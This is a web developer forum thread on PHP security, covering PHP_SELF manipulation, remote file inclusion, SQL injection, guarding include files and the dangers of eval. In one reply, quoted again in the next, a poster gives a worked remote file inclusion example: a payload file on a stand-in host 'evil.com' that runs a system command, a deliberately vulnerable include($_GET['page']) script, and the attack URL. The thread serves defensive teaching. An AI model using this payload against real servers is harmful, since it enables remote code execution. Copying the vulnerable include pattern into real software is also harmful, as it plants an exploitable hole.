1. Banned (not really)
    Devshed Supreme Being (6500+ posts)

    Join Date
    Dec 1999
    Location
    Brussels, Belgium
    Posts
    14,642
    Rep Power
    4492
    Simon brought up this article on how $PHP_SELF and $_SERVER['PHP_SELF'] are taken directly from user input and can be manipulated to contain malicious content.

    I never thought of them as user input, so this was interesting to me.

    ---John Holmes...

    Comments on this post

    • codergeek42 agrees : Nice read. Thanks, Sep. :)
    -- Cigars, whiskey and wild, wild women. --
  2. His name is Robert Paulson!
    Devshed Frequenter (2500 - 2999 posts)

    Join Date
    Feb 2005
    Location
    Paper Street
    Posts
    2,692
    Rep Power
    153
    Originally Posted by Sepodati
    Simon brought up this article on how $PHP_SELF and $_SERVER['PHP_SELF'] are taken directly from user input and can be manipulated to contain malicious content.

    I never thought of them as user input, so this was interesting to me.

    ---John Holmes...
    Obviously building portable code, this can be an issue, but I tried the mentioned tests on my server (IIS), and it errors out, never processing the code. I guess it's really no big deal to CYA and use htmlentities or specialchars on the PHP_SELF output... is that the concensus(sp?)... there seems to be quite a bit of confusion with the user response at the bottom...
    Environmental LIMS
    What the hell is all this LIMS st*ff about?
    ---------------------------------------
    PHP Pagination Function
    PHP Drop Down Menus
  3. No Profile Picture
    Registered User
    Devshed Newbie (0 - 499 posts)

    Join Date
    Sep 2003
    Location
    Belgium
    Posts
    11
    Rep Power
    0
    Originally Posted by Sepodati
    Simon brought up this article on how $PHP_SELF and $_SERVER['PHP_SELF'] are taken directly from user input and can be manipulated to contain malicious content.

    I never thought of them as user input, so this was interesting to me.

    ---John Holmes...
    Thanks, seems like I will have to do a little fixing I guess.
  4. Moderator Emeritus
    Devshed Supreme Being (6500+ posts)

    Join Date
    Feb 2002
    Location
    Austin, TX
    Posts
    7,186
    Rep Power
    2265

    SANS Top 20 Vulnerabilities - PHP is # 3


    If you're a PHP developer or an admin of a server actively running PHP, you should read this article:

    http://www.sans.org/top20/#c3

    SANS has identified several PHP-related threats as being #3 on their list of Top 10 cross-platform vulnerabilites, right after backup and anti-virus software (Microsoft has their own category).

    Beyond what you as a developer and/or admin can do to mitigate these risks (like using the Hardened PHP distro), we as PHP developers/admins should be asking Zend what they're actively doing to reduce these risks.
    DrGroove, Devshed Moderator | New to Devshed? Read the User Guide | Connect with me on LinkedIn
  5. No Profile Picture
    Contributing User
    Devshed Beginner (1000 - 1499 posts)

    Join Date
    Apr 2003
    Location
    Tacoma, WA
    Posts
    1,355
    Rep Power
    15
    Originally Posted by drgroove
    If you're a PHP developer or an admin of a server actively running PHP, you should read this article:

    http://www.sans.org/top20/#c3

    SANS has identified several PHP-related threats as being #3 on their list of Top 10 cross-platform vulnerabilites, right after backup and anti-virus software (Microsoft has their own category).

    Beyond what you as a developer and/or admin can do to mitigate these risks (like using the Hardened PHP distro), we as PHP developers/admins should be asking Zend what they're actively doing to reduce these risks.
    My biggest issue with articles like this as there are no examples to test the issues with my own scripts. EG: I have, in the past, tried to do the remote file include I think by building a page that had a include($_GET['file']) kind of thing. I never could get it to work. Does that mean my server (which was a shared hosting service) is setup correctly against that kind of thing, or was I not attacking properly.

    I have also tried to do MySql attacks (like adding a ; and then a drop database kind of thing) in an unvalidated input field, again with no effect

    Does anyone have a toolkit with examples to attempt exploits?

    Obviously hacker could use this, but I gotta think they already do.
    Suddenly nothing happened.
  6. Wiser? Not exactly.
    Devshed God 1st Plane (5500 - 5999 posts)

    Join Date
    May 2001
    Location
    Bonita Springs, FL
    Posts
    5,947
    Rep Power
    4033
    Originally Posted by TuxLives
    Does that mean my server (which was a shared hosting service) is setup correctly against that kind of thing, or was I not attacking properly.
    Probably the latter. For instance, the include() attack is a pretty easy one to pull off. One limiting factor for a while (but not anymore) was that the windows version of PHP didn't support includ()ing URLs. You could still include other files on the computer though.

    The include attack has quite a few examples out there (I've written some of em) but as a repeat it's a little something like this:

    [code=http://www.evil.com/script.txt]
    <?php
    system('ls -l'); //Or whatever bad code they wanted to write.
    ?>
    [/code]

    [code=http://www.vulnerable.com/index.php]
    <?php
    if ($_GET['page'])){
    include($_GET['page']);
    }
    else {
    include('main.php');
    }
    ?>
    [/code]

    attack with: http://www.vulnerable.com/index.php?page=http://www.evil.com/script.txt



    SQL Injection using mysql is another one that is a little bit harder to do as well. Main reason being that in PHP, you can't send multiple queries to mysql in one call to mysql_query. That restriction may eventually be lifted though, I couldn't tell you.

    How ever, if say you were using a db wrapper, and then your script got moved to another database system such as MS-SQL where multiple-queries at one was a valid thing, then a person could exploit unescaped input to add a drop query to the end of your query, or some other equally bad statement.
    Recycle your old CD's, don't just trash them



    If I helped you out, show some love with some reputation, or tip with Bitcoins to 1N645HfYf63UbcvxajLKiSKpYHAq2Zxud
  7. No Profile Picture
    Contributing User
    Devshed Beginner (1000 - 1499 posts)

    Join Date
    Apr 2003
    Location
    Tacoma, WA
    Posts
    1,355
    Rep Power
    15
    Originally Posted by kicken
    Probably the latter. For instance, the include() attack is a pretty easy one to pull off. One limiting factor for a while (but not anymore) was that the windows version of PHP didn't support includ()ing URLs. You could still include other files on the computer though.

    The include attack has quite a few examples out there (I've written some of em) but as a repeat it's a little something like this:

    [code=http://www.evil.com/script.txt]
    <?php
    system('ls -l'); //Or whatever bad code they wanted to write.
    ?>
    [/code]

    [code=http://www.vulnerable.com/index.php]
    <?php
    if ($_GET['page'])){
    include($_GET['page']);
    }
    else {
    include('main.php');
    }
    ?>
    [/code]

    attack with: http://www.vulnerable.com/index.php?page=http://www.evil.com/script.txt



    SQL Injection using mysql is another one that is a little bit harder to do as well. Main reason being that in PHP, you can't send multiple queries to mysql in one call to mysql_query. That restriction may eventually be lifted though, I couldn't tell you.

    How ever, if say you were using a db wrapper, and then your script got moved to another database system such as MS-SQL where multiple-queries at one was a valid thing, then a person could exploit unescaped input to add a drop query to the end of your query, or some other equally bad statement.
    Great, thanks. I think that the community really needs solid examples that we can say "this will test for this", that way if I try it and it does not work I can check something off my list (like my vaildation is working or globals are off or whatever).
    Suddenly nothing happened.
  8. Contributing User
    Devshed Novice (500 - 999 posts)

    Join Date
    Jan 2006
    Location
    India
    Posts
    857
    Rep Power
    548
    put a file index.php to every directory of your project so that if someone tries to put url like http://www.somename.com/images/ to see the list of images, he will be unable to do so.

    The same thing you can also do in the server settings and through .htaccess file if you don't want to put index.php to all the directories.
  9. No Profile Picture
    Redpill
    Devshed Intermediate (1500 - 1999 posts)

    Join Date
    Nov 2005
    Posts
    1,660
    Rep Power
    151
    You could just mark all the folders "403 Forbidden" and setup 403 to redirect somewhere.
  10. No Profile Picture
    Registered User
    Devshed Newbie (0 - 499 posts)

    Join Date
    Jul 2006
    Posts
    1
    Rep Power
    0
    This thread took me awhile to read. I still have yet to figure out why so many people were fighting over the .inc files. It's just an extention. .inc.php works just as well, no .htaccess would be needed. It shows that it is a include file WITH PHP contents. Also like someone said above you can always just add:

    mainfile.php
    Code:
    <?php
    
    define("IN_SCRIPT", true);
    
    ?>
    include.inc.php
    Code:
    <?php
    
    if(!defined("IN_SCRIPT")) {
          die("Hacker attempt!");
    }
    
    ?>
    The above example is based off of PHPBB.
  11. The Scott Spirit
    Devshed Novice (500 - 999 posts)

    Join Date
    Mar 2005
    Location
    Holland
    Posts
    569
    Rep Power
    36
    To make sure an file is included and not being executed directly I use this line of code:
    php Code:
     
    //do not run if not included.
    if (realpath(__FILE__) == realpath($_SERVER['SCRIPT_FILENAME'])) {
      exit;
    }


    works like a charm!

    Comments on this post

    • Thr3ddy agrees
  12. Web Developer/Musician
    Devshed Regular (2000 - 2499 posts)

    Join Date
    Nov 2004
    Location
    Tennessee Mountains
    Posts
    2,408
    Rep Power
    1031
    Remember user input doesn't just mean normal GET and POST variables. One XMLRPC exploit I saw (PHPAds), exploited the use of eval while sorting through data from XML. With web services being so popular, be aware of this.
  13. fork while true;
    Devshed God 1st Plane (5500 - 5999 posts)

    Join Date
    May 2005
    Location
    England, UK
    Posts
    5,538
    Rep Power
    1051
    Originally Posted by Hammer65
    Remember user input doesn't just mean normal GET and POST variables. One XMLRPC exploit I saw (PHPAds), exploited the use of eval while sorting through data from XML. With web services being so popular, be aware of this.
    Eval is a major major hole. PHP is one of those languages where there is a function for everything if you look hard enough, you should NEVER need to use eval. There was a big hole in php's xml parsing itself a while back because the author used eval.
  14. No Profile Picture
    Contributing User
    Devshed Newbie (0 - 499 posts)

    Join Date
    Jan 2004
    Posts
    32
    Rep Power
    11
    Thanks for the great information
    Thanks,
    Wiz
  15. Banned (not really)
    Devshed Supreme Being (6500+ posts)

    Join Date
    Dec 1999
    Location
    Brussels, Belgium
    Posts
    14,642
    Rep Power
    4492
    If you're using PHP 5.2 or later, use the built-in Filter Functions to sanitize and validate user input. If you're stuck on an earlier version, try to include the extension through PECL.

    Also note that the filter.default and filter.default_flags can be set in php.ini, .htaccess or within your script with ini_set().

    ---John Holmes...
    -- Cigars, whiskey and wild, wild women. --

IMN logo majestic logo threadwatch logo seochat tools logo